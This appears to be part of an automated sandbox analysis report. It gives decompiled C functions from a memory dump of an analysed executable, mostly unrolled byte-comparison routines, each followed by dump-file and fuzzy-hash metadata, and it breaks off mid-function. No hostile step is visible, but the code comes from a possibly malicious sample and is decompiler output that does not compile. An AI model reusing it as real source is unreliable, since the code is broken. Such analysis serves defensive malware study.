                  						__edx = (__esi > 0) + (__esi > 0) - 1;
                  						__esi = __edx;
                  						if(__edx != 0) {
                  							goto L1;
                  						}
                  						goto L10;
                  					}
                  					0 = 0 | __esi > 0x00000000;
                  					__edx = (__esi > 0) + (__esi > 0) - 1;
                  					__esi = __edx;
                  					if(__edx != 0) {
                  						goto L1;
                  					}
                  					goto L8;
                  				}
                  				L1:
                  				_t192 = _t309;
                  				goto L3;
                  			}

                  Memory Dump Source
                  • Source File: 00000002.00000002.332584154.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000002.00000002.332564319.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000002.00000002.332671161.000000000044F000.00000004.00020000.sdmp
                  • Associated: 00000002.00000002.332692191.000000000047B000.00000002.00020000.sdmp
                  • Associated: 00000002.00000002.332735526.0000000000488000.00000002.00020000.sdmp
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: c40bcf876c129f9393d32ca3cb7471e4bcf7a4352579634fb414d11934eaa4f2
                  • Instruction ID: 1ad419e0b28d6264509255d004894f3c4e1dcf1b6255f109f8943ce5774361dd
                  • Opcode Fuzzy Hash: c40bcf876c129f9393d32ca3cb7471e4bcf7a4352579634fb414d11934eaa4f2
                  • Instruction Fuzzy Hash: 33D17D73E0A9B30A8735852D615823FEAE26FD164035FC7E2CCD03F38AD62A9C4196D4
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E004208E1(void* __eax, void* __ecx) {
                  				void* _t183;
                  				signed int _t184;
                  				void* _t187;
                  				signed char _t193;
                  				signed char _t194;
                  				signed char _t195;
                  				signed char _t196;
                  				signed char _t198;
                  				signed int _t296;
                  				void* _t299;
                  				void* _t301;
                  				void* _t303;
                  				void* _t306;
                  				void* _t308;
                  				void* _t310;
                  				void* _t313;
                  				void* _t315;
                  				void* _t317;
                  				void* _t320;
                  				void* _t322;
                  				void* _t324;
                  				void* _t327;
                  				void* _t329;
                  				void* _t331;
                  				void* _t334;
                  				void* _t336;
                  				void* _t338;
                  
                  				_t187 = __ecx;
                  				_t183 = __eax;
                  				if( *((intOrPtr*)(__eax - 0x1d)) ==  *((intOrPtr*)(__ecx - 0x1d))) {
                  					_t296 = 0;
                  					L12:
                  					if(_t296 != 0) {
                  						goto L1;
                  					}
                  					_t193 =  *(_t183 - 0x19);
                  					if(_t193 ==  *(_t187 - 0x19)) {
                  						_t296 = 0;
                  						L23:
                  						if(_t296 != 0) {
                  							goto L1;
                  						}
                  						_t194 =  *(_t183 - 0x15);
                  						if(_t194 ==  *(_t187 - 0x15)) {
                  							_t296 = 0;
                  							L34:
                  							if(_t296 != 0) {
                  								goto L1;
                  							}
                  							_t195 =  *(_t183 - 0x11);
                  							if(_t195 ==  *(_t187 - 0x11)) {
                  								_t296 = 0;
                  								L45:
                  								if(_t296 != 0) {
                  									goto L1;
                  								}
                  								_t196 =  *(_t183 - 0xd);
                  								if(_t196 ==  *(_t187 - 0xd)) {
                  									_t296 = 0;
                  									L56:
                  									if(_t296 != 0) {
                  										goto L1;
                  									}
                  									if( *(_t183 - 9) ==  *(_t187 - 9)) {
                  										_t296 = 0;
                  										L67:
                  										if(_t296 != 0) {
                  											goto L1;
                  										}
                  										_t198 =  *(_t183 - 5);
                  										if(_t198 ==  *(_t187 - 5)) {
                  											_t296 = 0;
                  											L78:
                  											if(_t296 != 0) {
                  												goto L1;
                  											}
                  											_t184 = ( *(_t183 - 1) & 0x000000ff) - ( *(_t187 - 1) & 0x000000ff);
                  											if(_t184 != 0) {
                  												_t184 = (0 | _t184 > 0x00000000) + (0 | _t184 > 0x00000000) - 1;
                  											}
                  											L2:
                  											return _t184;
                  										}
                  										_t299 = (_t198 & 0x000000ff) - ( *(_t187 - 5) & 0x000000ff);
                  										if(_t299 == 0) {
                  											L71:
                  											_t301 = ( *(_t183 - 4) & 0x000000ff) - ( *(_t187 - 4) & 0x000000ff);
                  											if(_t301 == 0) {
                  												L73:
                  												_t303 = ( *(_t183 - 3) & 0x000000ff) - ( *(_t187 - 3) & 0x000000ff);
                  												if(_t303 == 0) {
                  													L75:
                  													_t296 = ( *(_t183 - 2) & 0x000000ff) - ( *(_t187 - 2) & 0x000000ff);
                  													if(_t296 != 0) {
                  														_t296 = (0 | _t296 > 0x00000000) + (0 | _t296 > 0x00000000) - 1;
                  													}
                  													goto L78;
                  												}
                  												_t296 = (0 | _t303 > 0x00000000) + (0 | _t303 > 0x00000000) - 1;
                  												if(_t296 != 0) {
                  													goto L1;
                  												}
                  												goto L75;
                  											}
                  											_t296 = (0 | _t301 > 0x00000000) + (0 | _t301 > 0x00000000) - 1;
                  											if(_t296 != 0) {
                  												goto L1;
                  											}
                  											goto L73;
                  										}
                  										_t296 = (0 | _t299 > 0x00000000) + (0 | _t299 > 0x00000000) - 1;
                  										if(_t296 != 0) {
                  											goto L1;
                  										}
                  										goto L71;
                  									}
                  									_t306 = ( *(_t183 - 9) & 0x000000ff) - ( *(_t187 - 9) & 0x000000ff);
                  									if(_t306 == 0) {
                  										L60:
                  										_t308 = ( *(_t183 - 8) & 0x000000ff) - ( *(_t187 - 8) & 0x000000ff);
                  										if(_t308 == 0) {
                  											L62:
                  											_t310 = ( *(_t183 - 7) & 0x000000ff) - ( *(_t187 - 7) & 0x000000ff);
                  											if(_t310 == 0) {
                  												L64:
                  												_t296 = ( *(_t183 - 6) & 0x000000ff) - ( *(_t187 - 6) & 0x000000ff);
                  												if(_t296 != 0) {
                  													_t296 = (0 | _t296 > 0x00000000) + (0 | _t296 > 0x00000000) - 1;
                  												}
                  												goto L67;
                  											}
                  											_t296 = (0 | _t310 > 0x00000000) + (0 | _t310 > 0x00000000) - 1;
                  											if(_t296 != 0) {
                  												goto L1;
                  											}
                  											goto L64;
                  										}
                  										_t296 = (0 | _t308 > 0x00000000) + (0 | _t308 > 0x00000000) - 1;
                  										if(_t296 != 0) {
                  											goto L1;
                  										}
                  										goto L62;
                  									}
                  									_t296 = (0 | _t306 > 0x00000000) + (0 | _t306 > 0x00000000) - 1;
                  									if(_t296 != 0) {
                  										goto L1;
                  									}
                  									goto L60;
                  								}
                  								_t313 = (_t196 & 0x000000ff) - ( *(_t187 - 0xd) & 0x000000ff);
                  								if(_t313 == 0) {
                  									L49:
                  									_t315 = ( *(_t183 - 0xc) & 0x000000ff) - ( *(_t187 - 0xc) & 0x000000ff);
                  									if(_t315 == 0) {
                  										L51:
                  										_t317 = ( *(_t183 - 0xb) & 0x000000ff) - ( *(_t187 - 0xb) & 0x000000ff);
                  										if(_t317 == 0) {
                  											L53:
                  											_t296 = ( *(_t183 - 0xa) & 0x000000ff) - ( *(_t187 - 0xa) & 0x000000ff);
                  											if(_t296 != 0) {
                  												_t296 = (0 | _t296 > 0x00000000) + (0 | _t296 > 0x00000000) - 1;
                  											}
                  											goto L56;
                  										}
                  										_t296 = (0 | _t317 > 0x00000000) + (0 | _t317 > 0x00000000) - 1;
                  										if(_t296 != 0) {
                  											goto L1;
                  										}
                  										goto L53;
                  									}
                  									_t296 = (0 | _t315 > 0x00000000) + (0 | _t315 > 0x00000000) - 1;
                  									if(_t296 != 0) {
                  										goto L1;
                  									}
                  									goto L51;
                  								}
                  								_t296 = (0 | _t313 > 0x00000000) + (0 | _t313 > 0x00000000) - 1;
                  								if(_t296 != 0) {
                  									goto L1;
                  								}
                  								goto L49;
                  							}
                  							_t320 = (_t195 & 0x000000ff) - ( *(_t187 - 0x11) & 0x000000ff);
                  							if(_t320 == 0) {
                  								L38:
                  								_t322 = ( *(_t183 - 0x10) & 0x000000ff) - ( *(_t187 - 0x10) & 0x000000ff);
                  								if(_t322 == 0) {
                  									L40:
                  									_t324 = ( *(_t183 - 0xf) & 0x000000ff) - ( *(_t187 - 0xf) & 0x000000ff);
                  									if(_t324 == 0) {
                  										L42:
                  										_t296 = ( *(_t183 - 0xe) & 0x000000ff) - ( *(_t187 - 0xe) & 0x000000ff);
                  										if(_t296 != 0) {
                  											_t296 = (0 | _t296 > 0x00000000) + (0 | _t296 > 0x00000000) - 1;
                  										}
                  										goto L45;
                  									}
                  									_t296 = (0 | _t324 > 0x00000000) + (0 | _t324 > 0x00000000) - 1;
                  									if(_t296 != 0) {
                  										goto L1;
                  									}
                  									goto L42;
                  								}
                  								_t296 = (0 | _t322 > 0x00000000) + (0 | _t322 > 0x00000000) - 1;
                  								if(_t296 != 0) {
                  									goto L1;
                  								}
                  								goto L40;
                  							}
                  							_t296 = (0 | _t320 > 0x00000000) + (0 | _t320 > 0x00000000) - 1;
                  							if(_t296 != 0) {
                  								goto L1;
                  							}
                  							goto L38;
                  						}
                  						_t327 = (_t194 & 0x000000ff) - ( *(_t187 - 0x15) & 0x000000ff);
                  						if(_t327 == 0) {
                  							L27:
                  							_t329 = ( *(_t183 - 0x14) & 0x000000ff) - ( *(_t187 - 0x14) & 0x000000ff);
                  							if(_t329 == 0) {
                  								L29:
                  								_t331 = ( *(_t183 - 0x13) & 0x000000ff) - ( *(_t187 - 0x13) & 0x000000ff);
                  								if(_t331 == 0) {
                  									L31:
                  									_t296 = ( *(_t183 - 0x12) & 0x000000ff) - ( *(_t187 - 0x12) & 0x000000ff);
                  									if(_t296 != 0) {
                  										_t296 = (0 | _t296 > 0x00000000) + (0 | _t296 > 0x00000000) - 1;
                  									}
                  									goto L34;
                  								}
                  								_t296 = (0 | _t331 > 0x00000000) + (0 | _t331 > 0x00000000) - 1;
                  								if(_t296 != 0) {
                  									goto L1;
                  								}
                  								goto L31;
                  							}
                  							_t296 = (0 | _t329 > 0x00000000) + (0 | _t329 > 0x00000000) - 1;
                  							if(_t296 != 0) {
                  								goto L1;
                  							}
                  							goto L29;
                  						}
                  						_t296 = (0 | _t327 > 0x00000000) + (0 | _t327 > 0x00000000) - 1;
                  						if(_t296 != 0) {
                  							goto L1;
                  						}
                  						goto L27;
                  					}
                  					_t334 = (_t193 & 0x000000ff) - ( *(_t187 - 0x19) & 0x000000ff);
                  					if(_t334 == 0) {
                  						L16:
                  						_t336 = ( *(_t183 - 0x18) & 0x000000ff) - ( *(_t187 - 0x18) & 0x000000ff);
                  						if(_t336 == 0) {
                  							L18:
                  							_t338 = ( *(_t183 - 0x17) & 0x000000ff) - ( *(_t187 - 0x17) & 0x000000ff);
                  							if(_t338 == 0) {
                  								L20:
                  								_t296 = ( *(_t183 - 0x16) & 0x000000ff) - ( *(_t187 - 0x16) & 0x000000ff);
                  								if(_t296 != 0) {
                  									_t296 = (0 | _t296 > 0x00000000) + (0 | _t296 > 0x00000000) - 1;
                  								}
                  								goto L23;
                  							}
                  							_t296 = (0 | _t338 > 0x00000000) + (0 | _t338 > 0x00000000) - 1;
                  							if(_t296 != 0) {
                  								goto L1;
                  							}
                  							goto L20;
                  						}
                  						_t296 = (0 | _t336 > 0x00000000) + (0 | _t336 > 0x00000000) - 1;
                  						if(_t296 != 0) {
                  							goto L1;
                  						}
                  						goto L18;
                  					}
                  					_t296 = (0 | _t334 > 0x00000000) + (0 | _t334 > 0x00000000) - 1;
                  					if(_t296 != 0) {
                  						goto L1;
                  					}
                  					goto L16;
                  				} else {
                  					__esi = __dl & 0x000000ff;
                  					__edx =  *(__ecx - 0x1d) & 0x000000ff;
                  					__esi = (__dl & 0x000000ff) - ( *(__ecx - 0x1d) & 0x000000ff);
                  					if(__esi == 0) {
                  						L5:
                  						__esi =  *(__eax - 0x1c) & 0x000000ff;
                  						__edx =  *(__ecx - 0x1c) & 0x000000ff;
                  						__esi = ( *(__eax - 0x1c) & 0x000000ff) - ( *(__ecx - 0x1c) & 0x000000ff);
                  						if(__esi == 0) {
                  							L7:
                  							__esi =  *(__eax - 0x1b) & 0x000000ff;
                  							__edx =  *(__ecx - 0x1b) & 0x000000ff;
                  							__esi = ( *(__eax - 0x1b) & 0x000000ff) - ( *(__ecx - 0x1b) & 0x000000ff);
                  							if(__esi == 0) {
                  								L9:
                  								__esi =  *(__eax - 0x1a) & 0x000000ff;
                  								__edx =  *(__ecx - 0x1a) & 0x000000ff;
                  								__esi = ( *(__eax - 0x1a) & 0x000000ff) - ( *(__ecx - 0x1a) & 0x000000ff);
                  								if(__esi != 0) {
                  									0 = 0 | __esi > 0x00000000;
                  									__edx = (__esi > 0) + (__esi > 0) - 1;
                  									__esi = (__esi > 0) + (__esi > 0) - 1;
                  								}
                  								goto L12;
                  							}
                  							0 = 0 | __esi > 0x00000000;
                  							__edx = (__esi > 0) + (__esi > 0) - 1;
                  							__esi = __edx;
                  							if(__edx != 0) {
                  								goto L1;
                  							}
                  							goto L9;
                  						}
                  						0 = 0 | __esi > 0x00000000;
                  						__edx = (__esi > 0) + (__esi > 0) - 1;
                  						__esi = __edx;
                  						if(__edx != 0) {
                  							goto L1;
                  						}
                  						goto L7;
                  					}
                  					0 = 0 | __esi > 0x00000000;
                  					__edx = (__esi > 0) + (__esi > 0) - 1;
                  					__esi = __edx;
                  					if(__edx != 0) {
                  						goto L1;
                  					}
                  					goto L5;
                  				}
                  				L1:
                  				_t184 = _t296;
                  				goto L2;
                  			}

                  Memory Dump Source
                  • Source File: 00000002.00000002.332584154.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000002.00000002.332564319.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000002.00000002.332671161.000000000044F000.00000004.00020000.sdmp
                  • Associated: 00000002.00000002.332692191.000000000047B000.00000002.00020000.sdmp
                  • Associated: 00000002.00000002.332735526.0000000000488000.00000002.00020000.sdmp
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 8709e21481f65d4d57cc4b3952fb3adbcebd3cc8b64ff3d20fdf858c0bfd14a0
                  • Instruction ID: 7798e54c5d41d41a509505e97969fc7ecc8be5c4d076ede3cbf0d1f7d5ebd489
                  • Opcode Fuzzy Hash: 8709e21481f65d4d57cc4b3952fb3adbcebd3cc8b64ff3d20fdf858c0bfd14a0
                  • Instruction Fuzzy Hash: 37C17EB3E0A9B30A8736852D616812FEEE26FD175035EC7E2CCD43F38AD12A9D4185D4
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E0042050D(void* __eax, void* __ecx) {
                  				void* _t177;
                  				signed int _t178;
                  				void* _t181;
                  				signed char _t187;
                  				signed char _t188;
                  				signed char _t189;
                  				signed char _t191;
                  				signed char _t192;
                  				signed int _t198;
                  				signed int _t284;
                  				void* _t287;
                  				void* _t289;
                  				void* _t291;
                  				void* _t293;
                  				void* _t295;
                  				void* _t297;
                  				void* _t300;
                  				void* _t302;
                  				void* _t304;
                  				void* _t307;
                  				void* _t309;
                  				void* _t311;
                  				void* _t314;
                  				void* _t316;
                  				void* _t318;
                  				void* _t321;
                  				void* _t323;
                  				void* _t325;
                  
                  				_t181 = __ecx;
                  				_t177 = __eax;
                  				if( *((intOrPtr*)(__eax - 0x1c)) ==  *((intOrPtr*)(__ecx - 0x1c))) {
                  					_t284 = 0;
                  					L11:
                  					if(_t284 != 0) {
                  						goto L1;
                  					}
                  					_t187 =  *(_t177 - 0x18);
                  					if(_t187 ==  *(_t181 - 0x18)) {
                  						_t284 = 0;
                  						L22:
                  						if(_t284 != 0) {
                  							goto L1;
                  						}
                  						_t188 =  *(_t177 - 0x14);
                  						if(_t188 ==  *(_t181 - 0x14)) {
                  							_t284 = 0;
                  							L33:
                  							if(_t284 != 0) {
                  								goto L1;
                  							}
                  							_t189 =  *(_t177 - 0x10);
                  							if(_t189 ==  *(_t181 - 0x10)) {
                  								_t284 = 0;
                  								L44:
                  								if(_t284 != 0) {
                  									goto L1;
                  								}
                  								if( *(_t177 - 0xc) ==  *(_t181 - 0xc)) {
                  									_t284 = 0;
                  									L55:
                  									if(_t284 != 0) {
                  										goto L1;
                  									}
                  									_t191 =  *(_t177 - 8);
                  									if(_t191 ==  *(_t181 - 8)) {
                  										_t284 = 0;
                  										L66:
                  										if(_t284 != 0) {
                  											goto L1;
                  										}
                  										_t192 =  *(_t177 - 4);
                  										if(_t192 ==  *(_t181 - 4)) {
                  											_t178 = 0;
                  											L78:
                  											if(_t178 == 0) {
                  												_t178 = 0;
                  											}
                  											L80:
                  											return _t178;
                  										}
                  										_t287 = (_t192 & 0x000000ff) - ( *(_t181 - 4) & 0x000000ff);
                  										if(_t287 == 0) {
                  											L70:
                  											_t289 = ( *(_t177 - 3) & 0x000000ff) - ( *(_t181 - 3) & 0x000000ff);
                  											if(_t289 == 0) {
                  												L72:
                  												_t291 = ( *(_t177 - 2) & 0x000000ff) - ( *(_t181 - 2) & 0x000000ff);
                  												if(_t291 == 0) {
                  													L75:
                  													_t178 = ( *(_t177 - 1) & 0x000000ff) - ( *(_t181 - 1) & 0x000000ff);
                  													if(_t178 != 0) {
                  														_t178 = (0 | _t178 > 0x00000000) + (0 | _t178 > 0x00000000) - 1;
                  													}
                  													goto L78;
                  												}
                  												_t198 = (0 | _t291 > 0x00000000) + (0 | _t291 > 0x00000000) - 1;
                  												if(_t198 == 0) {
                  													goto L75;
                  												}
                  												L74:
                  												_t178 = _t198;
                  												goto L78;
                  											}
                  											_t198 = (0 | _t289 > 0x00000000) + (0 | _t289 > 0x00000000) - 1;
                  											if(_t198 != 0) {
                  												goto L74;
                  											}
                  											goto L72;
                  										}
                  										_t198 = (0 | _t287 > 0x00000000) + (0 | _t287 > 0x00000000) - 1;
                  										if(_t198 != 0) {
                  											goto L74;
                  										}
                  										goto L70;
                  									}
                  									_t293 = (_t191 & 0x000000ff) - ( *(_t181 - 8) & 0x000000ff);
                  									if(_t293 == 0) {
                  										L59:
                  										_t295 = ( *(_t177 - 7) & 0x000000ff) - ( *(_t181 - 7) & 0x000000ff);
                  										if(_t295 == 0) {
                  											L61:
                  											_t297 = ( *(_t177 - 6) & 0x000000ff) - ( *(_t181 - 6) & 0x000000ff);
                  											if(_t297 == 0) {
                  												L63:
                  												_t284 = ( *(_t177 - 5) & 0x000000ff) - ( *(_t181 - 5) & 0x000000ff);
                  												if(_t284 != 0) {
                  													_t284 = (0 | _t284 > 0x00000000) + (0 | _t284 > 0x00000000) - 1;
                  												}
                  												goto L66;
                  											}
                  											_t284 = (0 | _t297 > 0x00000000) + (0 | _t297 > 0x00000000) - 1;
                  											if(_t284 != 0) {
                  												goto L1;
                  											}
                  											goto L63;
                  										}
                  										_t284 = (0 | _t295 > 0x00000000) + (0 | _t295 > 0x00000000) - 1;
                  										if(_t284 != 0) {
                  											goto L1;
                  										}
                  										goto L61;
                  									}
                  									_t284 = (0 | _t293 > 0x00000000) + (0 | _t293 > 0x00000000) - 1;
                  									if(_t284 != 0) {
                  										goto L1;
                  									}
                  									goto L59;
                  								}
                  								_t300 = ( *(_t177 - 0xc) & 0x000000ff) - ( *(_t181 - 0xc) & 0x000000ff);
                  								if(_t300 == 0) {
                  									L48:
                  									_t302 = ( *(_t177 - 0xb) & 0x000000ff) - ( *(_t181 - 0xb) & 0x000000ff);
                  									if(_t302 == 0) {
                  										L50:
                  										_t304 = ( *(_t177 - 0xa) & 0x000000ff) - ( *(_t181 - 0xa) & 0x000000ff);
                  										if(_t304 == 0) {
                  											L52:
                  											_t284 = ( *(_t177 - 9) & 0x000000ff) - ( *(_t181 - 9) & 0x000000ff);
                  											if(_t284 != 0) {
                  												_t284 = (0 | _t284 > 0x00000000) + (0 | _t284 > 0x00000000) - 1;
                  											}
                  											goto L55;
                  										}
                  										_t284 = (0 | _t304 > 0x00000000) + (0 | _t304 > 0x00000000) - 1;
                  										if(_t284 != 0) {
                  											goto L1;
                  										}
                  										goto L52;
                  									}
                  									_t284 = (0 | _t302 > 0x00000000) + (0 | _t302 > 0x00000000) - 1;
                  									if(_t284 != 0) {
                  										goto L1;
                  									}
                  									goto L50;
                  								}
                  								_t284 = (0 | _t300 > 0x00000000) + (0 | _t300 > 0x00000000) - 1;
                  								if(_t284 != 0) {
                  									goto L1;
                  								}
                  								goto L48;
                  							}
                  							_t307 = (_t189 & 0x000000ff) - ( *(_t181 - 0x10) & 0x000000ff);
                  							if(_t307 == 0) {
                  								L37:
                  								_t309 = ( *(_t177 - 0xf) & 0x000000ff) - ( *(_t181 - 0xf) & 0x000000ff);
                  								if(_t309 == 0) {
                  									L39:
                  									_t311 = ( *(_t177 - 0xe) & 0x000000ff) - ( *(_t181 - 0xe) & 0x000000ff);
                  									if(_t311 == 0) {
                  										L41:
                  										_t284 = ( *(_t177 - 0xd) & 0x000000ff) - ( *(_t181 - 0xd) & 0x000000ff);
                  										if(_t284 != 0) {
                  											_t284 = (0 | _t284 > 0x00000000) + (0 | _t284 > 0x00000000) - 1;
                  										}
                  										goto L44;
                  									}
                  									_t284 = (0 | _t311 > 0x00000000) + (0 | _t311 > 0x00000000) - 1;
                  									if(_t284 != 0) {
                  										goto L1;
                  									}
                  									goto L41;
                  								}
                  								_t284 = (0 | _t309 > 0x00000000) + (0 | _t309 > 0x00000000) - 1;
                  								if(_t284 != 0) {
                  									goto L1;
                  								}
                  								goto L39;
                  							}
                  							_t284 = (0 | _t307 > 0x00000000) + (0 | _t307 > 0x00000000) - 1;
                  							if(_t284 != 0) {
                  								goto L1;
                  							}
                  							goto L37;
                  						}
                  						_t314 = (_t188 & 0x000000ff) - ( *(_t181 - 0x14) & 0x000000ff);
                  						if(_t314 == 0) {
                  							L26:
                  							_t316 = ( *(_t177 - 0x13) & 0x000000ff) - ( *(_t181 - 0x13) & 0x000000ff);
                  							if(_t316 == 0) {
                  								L28:
                  								_t318 = ( *(_t177 - 0x12) & 0x000000ff) - ( *(_t181 - 0x12) & 0x000000ff);
                  								if(_t318 == 0) {
                  									L30:
                  									_t284 = ( *(_t177 - 0x11) & 0x000000ff) - ( *(_t181 - 0x11) & 0x000000ff);
                  									if(_t284 != 0) {
                  										_t284 = (0 | _t284 > 0x00000000) + (0 | _t284 > 0x00000000) - 1;
                  									}
                  									goto L33;
                  								}
                  								_t284 = (0 | _t318 > 0x00000000) + (0 | _t318 > 0x00000000) - 1;
                  								if(_t284 != 0) {
                  									goto L1;
                  								}
                  								goto L30;
                  							}
                  							_t284 = (0 | _t316 > 0x00000000) + (0 | _t316 > 0x00000000) - 1;
                  							if(_t284 != 0) {
                  								goto L1;
                  							}
                  							goto L28;
                  						}
                  						_t284 = (0 | _t314 > 0x00000000) + (0 | _t314 > 0x00000000) - 1;
                  						if(_t284 != 0) {
                  							goto L1;
                  						}
                  						goto L26;
                  					}
                  					_t321 = (_t187 & 0x000000ff) - ( *(_t181 - 0x18) & 0x000000ff);
                  					if(_t321 == 0) {
                  						L15:
                  						_t323 = ( *(_t177 - 0x17) & 0x000000ff) - ( *(_t181 - 0x17) & 0x000000ff);
                  						if(_t323 == 0) {
                  							L17:
                  							_t325 = ( *(_t177 - 0x16) & 0x000000ff) - ( *(_t181 - 0x16) & 0x000000ff);
                  							if(_t325 == 0) {
                  								L19:
                  								_t284 = ( *(_t177 - 0x15) & 0x000000ff) - ( *(_t181 - 0x15) & 0x000000ff);
                  								if(_t284 != 0) {
                  									_t284 = (0 | _t284 > 0x00000000) + (0 | _t284 > 0x00000000) - 1;
                  								}
                  								goto L22;
                  							}
                  							_t284 = (0 | _t325 > 0x00000000) + (0 | _t325 > 0x00000000) - 1;
                  							if(_t284 != 0) {
                  								goto L1;
                  							}
                  							goto L19;
                  						}
                  						_t284 = (0 | _t323 > 0x00000000) + (0 | _t323 > 0x00000000) - 1;
                  						if(_t284 != 0) {
                  							goto L1;
                  						}
                  						goto L17;
                  					}
                  					_t284 = (0 | _t321 > 0x00000000) + (0 | _t321 > 0x00000000) - 1;
                  					if(_t284 != 0) {
                  						goto L1;
                  					}
                  					goto L15;
                  				} else {
                  					__esi = __dl & 0x000000ff;
                  					__edx =  *(__ecx - 0x1c) & 0x000000ff;
                  					__esi = (__dl & 0x000000ff) - ( *(__ecx - 0x1c) & 0x000000ff);
                  					if(__esi == 0) {
                  						L4:
                  						__esi =  *(__eax - 0x1b) & 0x000000ff;
                  						__edx =  *(__ecx - 0x1b) & 0x000000ff;
                  						__esi = ( *(__eax - 0x1b) & 0x000000ff) - ( *(__ecx - 0x1b) & 0x000000ff);
                  						if(__esi == 0) {
                  							L6:
                  							__esi =  *(__eax - 0x1a) & 0x000000ff;
                  							__edx =  *(__ecx - 0x1a) & 0x000000ff;
                  							__esi = ( *(__eax - 0x1a) & 0x000000ff) - ( *(__ecx - 0x1a) & 0x000000ff);
                  							if(__esi == 0) {
                  								L8:
                  								__esi =  *(__eax - 0x19) & 0x000000ff;
                  								__edx =  *(__ecx - 0x19) & 0x000000ff;
                  								__esi = ( *(__eax - 0x19) & 0x000000ff) - ( *(__ecx - 0x19) & 0x000000ff);
                  								if(__esi != 0) {
                  									0 = 0 | __esi > 0x00000000;
                  									__edx = (__esi > 0) + (__esi > 0) - 1;
                  									__esi = (__esi > 0) + (__esi > 0) - 1;
                  								}
                  								goto L11;
                  							}
                  							0 = 0 | __esi > 0x00000000;
                  							__edx = (__esi > 0) + (__esi > 0) - 1;
                  							__esi = __edx;
                  							if(__edx != 0) {
                  								goto L1;
                  							}
                  							goto L8;
                  						}
                  						0 = 0 | __esi > 0x00000000;
                  						__edx = (__esi > 0) + (__esi > 0) - 1;
                  						__esi = __edx;
                  						if(__edx != 0) {
                  							goto L1;
                  						}
                  						goto L6;
                  					}
                  					0 = 0 | __esi > 0x00000000;
                  					__edx = (__esi > 0) + (__esi > 0) - 1;
                  					__esi = __edx;
                  					if(__edx != 0) {
                  						goto L1;
                  					}
                  					goto L4;
                  				}
                  				L1:
                  				_t178 = _t284;
                  				goto L80;
                  			}
































                  Memory Dump Source
                  • Source File: 00000002.00000002.332584154.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000002.00000002.332564319.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000002.00000002.332671161.000000000044F000.00000004.00020000.sdmp
                  • Associated: 00000002.00000002.332692191.000000000047B000.00000002.00020000.sdmp
                  • Associated: 00000002.00000002.332735526.0000000000488000.00000002.00020000.sdmp
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: a6a9d25a147ba64f4d06249d12fe21364a5b6889ab238d0ba2e949acfc497403
                  • Instruction ID: 03c660ef3c6cc9c18a98ddc921c7bc2ad25367a27bbd1fd26e0d4ee2ddb72157
                  • Opcode Fuzzy Hash: a6a9d25a147ba64f4d06249d12fe21364a5b6889ab238d0ba2e949acfc497403
                  • Instruction Fuzzy Hash: B7C18E73E0A9B34A8735852D615822FEEE26FD174035EC7A2CCD03F38AD12A9D419AD4
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 81%
                  			E0041A2C7(void* __edx, intOrPtr* _a4, signed int* _a8) {
                  				signed int _v8;
                  				signed int _v12;
                  				signed int _v16;
                  				signed int _v20;
                  				intOrPtr _v24;
                  				char _v28;
                  				char _v36;
                  				char _v44;
                  				char _v52;
                  				intOrPtr* _t90;
                  				intOrPtr* _t91;
                  				unsigned int _t94;
                  				signed char _t96;
                  				void* _t98;
                  				signed int _t100;
                  				signed int _t110;
                  				unsigned int _t112;
                  				signed char _t114;
                  				intOrPtr* _t119;
                  				void* _t129;
                  				intOrPtr* _t130;
                  				intOrPtr* _t136;
                  				unsigned int _t138;
                  				void* _t142;
                  				void* _t149;
                  				signed int* _t150;
                  				intOrPtr* _t154;
                  				char* _t156;
                  				signed int* _t159;
                  				intOrPtr* _t161;
                  				signed int _t162;
                  				signed int _t165;
                  				void* _t168;
                  				signed int* _t170;
                  				void* _t176;
                  				signed char _t185;
                  				void* _t194;
                  				void* _t218;
                  				signed int _t221;
                  				signed int* _t224;
                  				signed int _t225;
                  				void* _t227;
                  				void* _t228;
                  				void* _t230;
                  
                  				_t218 = __edx;
                  				_t90 =  *0x451258; // 0x0
                  				_t189 =  *_t90;
                  				_t228 = _t227 - 0x30;
                  				if(_t189 != 0) {
                  					__eflags = _t189 - 0x36;
                  					if(_t189 < 0x36) {
                  						L5:
                  						__eflags = _t189 - 0x5f;
                  						if(_t189 == 0x5f) {
                  							goto L7;
                  						} else {
                  							E00416DBC(_a4, 2);
                  							goto L2;
                  						}
                  					} else {
                  						__eflags = _t189 - 0x39;
                  						if(_t189 <= 0x39) {
                  							L7:
                  							_t185 = _t189 - 0x36;
                  							_t91 = _t90 + 1;
                  							 *0x451258 = _t91;
                  							__eflags = _t185 - 0x29;
                  							if(_t185 != 0x29) {
                  								__eflags = _t185;
                  								if(_t185 < 0) {
                  									goto L15;
                  								} else {
                  									__eflags = _t185 - 3;
                  									goto L14;
                  								}
                  								goto L16;
                  							} else {
                  								_t189 =  *_t91;
                  								__eflags = _t189;
                  								if(_t189 == 0) {
                  									E004177E3(_t189, _a4, 1, _a8);
                  									goto L18;
                  								} else {
                  									_t185 = _t189 - 0x3d;
                  									__eflags = _t185 - 4;
                  									 *0x451258 = _t91 + 1;
                  									if(_t185 < 4) {
                  										L15:
                  										_t185 = _t185 | 0xffffffff;
                  										__eflags = _t185;
                  									} else {
                  										__eflags = _t185 - 7;
                  										L14:
                  										if(__eflags > 0) {
                  											goto L15;
                  										}
                  									}
                  									L16:
                  									__eflags = _t185 - 0xffffffff;
                  									if(_t185 != 0xffffffff) {
                  										_v20 = _v20 & 0x00000000;
                  										_v16 = _v16 & 0xffff0000;
                  										_t224 = _a8;
                  										_v12 =  *_t224;
                  										_t221 = _t185 & 0x00000002;
                  										__eflags = _t221;
                  										_v8 = _t224[1];
                  										if(_t221 == 0) {
                  											L27:
                  											__eflags = _t185 & 0x00000004;
                  											if((_t185 & 0x00000004) != 0) {
                  												_t138 =  *0x451268; // 0x0
